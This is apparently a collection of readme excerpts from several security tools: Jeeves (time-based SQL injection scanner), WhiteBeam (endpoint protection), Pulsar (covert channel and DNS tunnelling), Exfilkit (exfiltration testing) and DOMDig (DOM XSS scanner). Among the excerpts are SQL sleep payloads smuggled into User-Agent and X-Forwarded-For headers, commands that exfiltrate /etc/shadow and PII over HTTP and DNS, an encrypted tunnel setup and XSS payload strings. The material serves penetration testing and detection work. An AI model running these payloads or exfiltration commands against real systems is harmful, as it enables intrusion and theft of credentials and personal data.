Using with sql payloads wordlist

cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Testing in headers

echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

OBS:

  • Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys"
  • Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )

This project is for educational and bug bounty porposes only! I do not support any illegal activities!.

If any error in the program, talk to me immediatly.

Please, also check these =>

Nilo - Checks if URL has status 200

SQLMAP

Blisqy Header time based SQLI



WhiteBeam - Transparent Endpoint Security


Transparent endpoint security

Features

  • Block and detect advanced attacks
  • Modern audited cryptography: RustCrypto for hashing and encryption
  • Highly compatible: Development focused on all platforms (incl. legacy) and architectures
  • Source available: Audits welcome
  • Reviewed by security researchers with combined 100+ years of experience

In Action

Installation

From Packages (Linux)

Distro-specific packages have not been released yet for WhiteBeam, check again soon!

From Releases (Linux)

  1. Download the latest release
  2. Ensure the release file hash matches the official hashes (How-to)
  3. Install:
    • ./whitebeam-installer install

From Source (Linux)

  1. Run tests (Optional):
    • cargo run test
  2. Compile:
    • cargo run build
  3. Install WhiteBeam:
    • cargo run install

Quick start

  1. Become root (sudo su/su root)
  2. Set a recovery secret. You'll be able to use this with whitebeam --auth to make changes to the system: whitebeam --setting RecoverySecret mask

How to Detect Attacks with WhiteBeam

Multiple guides are provided depending on your preference. Contact us so we can help you integrate WhiteBeam with your environment.

  1. Serverless guide, for passive review
  2. osquery Fleet setup guide, for passive review
  3. WhiteBeam Server setup guide, for active response

How to Prevent Attacks with WhiteBeam

WhiteBeam is experimental software. Contact us for assistance safely implementing it.
  1. Become root (sudo su/su root)
  2. Review the baseline at least 24 hours after installing WhiteBeam:
    • whitebeam --baseline
  3. Add trusted behavior to the whitelist, following the whitelisting guide
  4. Enable WhiteBeam prevention:
    • whitebeam --setting Prevention true


Pulsar - Data Exfiltration And Covert Communication Tool



Pulsar is a tool for data exfiltration and covert communication that enable you to create a secure data transfer, a bizarre chat or a network tunnel through different protocols, for example you can receive data from tcp connection and resend it to real destination through DNS packets.


Setting up Pulsar

Make sure you have at least Go 1.8 in your system to build Pulsar

First, getting the code from repository and compile it with following command:

$ cd pulsar
$ export GOPATH=$(shell pwd)
$ go get golang.org/x/net/icmp
$ go build -o bin/pulsar src/main.go

or run:

$ make

Connectors
ο“‘

A connector is a simple channel to the external world, with the connector you can read and write data from different sources.

  • Console:
    • Default in/out connector, read data from stdin and write to stdout
  • TCP
    • Read and write data through tcp connections

        tcp:127.0.0.1:9000
  • UDP
    • Read and write data through udp packet

        udp:127.0.0.1:9000
  • ICMP
    • Read and write data through icmp packet

        icmp:127.0.0.1 (the connection port is obviously useless)
  • DNS
    • Read and write data through dns packet

        dns:fakedomain.net@127.0.0.1:1994

You can use option --in in order to select input connector and option --out to select output connector:

    --in tcp:127.0.0.1:9000
--out dns:fkdns.lol:2.3.4.5:8989

Handlers


A handler allows you to change data in transit, you can combine handlers arbitrarily.

  • Stub:

    • Default, do nothing, pass through
  • Base32

    • Base32 encoder/decoder

        --handlers base32
  • Base64

    • Base64 encoder/decoder

        --handlers base64
  • Cipher

    • CTR cipher, support AES/DES/TDES in CTR mode (Default: AES)

        --handlers cipher:<key|[aes|des|tdes#key]>

You can use the --decode option to use ALL handlers in decoding mode

    --handlers base64,base32,base64,cipher:key --decode

Example

In the following example Pulsar will be used to create a secure two-way tunnel on DNS protocol, data will be read from TCP connection (simple nc client) and resend encrypted through the tunnel.

[nc 127.0.0.1 9000] <--TCP--> [pulsar] <--DNS--> [pulsar] <--TCP--> [nc -l 127.0.0.1 -p 9900]

192.168.1.198:

$ ./pulsar --in tcp:127.0.0.1:9000 --out dns:test.org@192.168.1.199:8989 --duplex --plain in --handlers 'cipher:supersekretkey!!'
$ nc 127.0.0.1 9000

192.168.1.199:

$ nc -l 127.0.0.1 -p 9900
$ ./pulsar --in dns:test.org@192.168.1.199:8989 --out tcp:127.0.0.1:9900 --duplex --plain out --handlers 'cipher:supersekretkey!!' --decode

Contribute

All contributions are always welcome



Exfilkit - Data Exfiltration Utility For Testing Detection Capabilities


Data exfiltration utility for testing detection capabilities

Description

Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.


Exfiltration How-To

/etc/shadow -> HTTP GET requests

Server

# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log

Client

$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

/etc/shadow -> HTTP POST requests

Server

# ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTServer -lp 80 -o output.log

Client

$ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.POSTClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r

PII -> PNG embedded in HTTP Response

Server

$ ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Server -lp 37650 -o output.log

Client

# ./exfilkit-cli.py -m exfilkit.methods.http.image_response.Client -rh 127.0.0.1 -rp 37650 -lp 80 -i ./samples/pii.txt -r

PII -> DNS subdomains querying

Server

# ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Server -lp 53 -o output.log

Client

$ ./exfilkit-cli.py -m exfilkit.methods.dns.subdomain_cipher.Client -rh 127.0.0.1 -rp 53 -i ./samples/pii.txt -r


DOMDig - DOM XSS Scanner For Single Page Applications


DOMDig is a DOM XSS scanner that runs inside the Chromium web browser and it can scan single page applications (SPA) recursively.
Unlike other scanners, DOMDig can crawl any webapplication (including gmail) by keeping track of DOM modifications and XHR/fetch/websocket requests and it can simulate a real user interaction by firing events. During this process, XSS payloads are put into input fields and their execution is tracked in order to find injection points and the related URL modifications.
It is based on htcrawl, a node library powerful enough to easily crawl a gmail account.


KEY FEATURES

  • Runs inside a real browser (Chromium)
  • Recursive DOM crawling engine
  • Handles XHR, fetch, JSONP and websockets requests
  • Supports cookies, proxy, custom headers, http auth and more
  • Scriptable login sequences

GETTING STARTED

Installation

git clone https://github.com/fcavallarin/domdig.git
cd domdig && npm i && cd ..
node domdig/domdig.js

Example

node domdig.js -c 'foo=bar' -p http:127.0.0.1:8080 https://htcap.org/scanme/domxss.php

Crawl Engine

DOMDig uses htcrawl as crawling engine, the same engine used by htcap.
The diagram shows the recursive crawling proccess.

The video below shows the engine crawling gmail. The crawl lasted for many hours and about 3000 XHR request have been captured.

Login Sequence

A login sequence (or initial sequence) is a json object containing a list of actions to take before the scan starts. Each element of the list is an array where the first element is the name of the action to take and the remaining elements are "parameters" to those actions. Actions are:

  • write <selector> <text>
  • click <selector>
  • clickToNavigate <selector>
  • sleep <seconds>

Example

Payloads file

Payloads can be loaded from json file (-P option) as array of strings. To build custom payloads, the string window.___xssSink({0}) must be used as the function to be executed (instead of the classic alert(1))

Example

[
';window.___xssSink({0});',
'<img src="a" onerror="window.___xssSink({0})">'
]


❌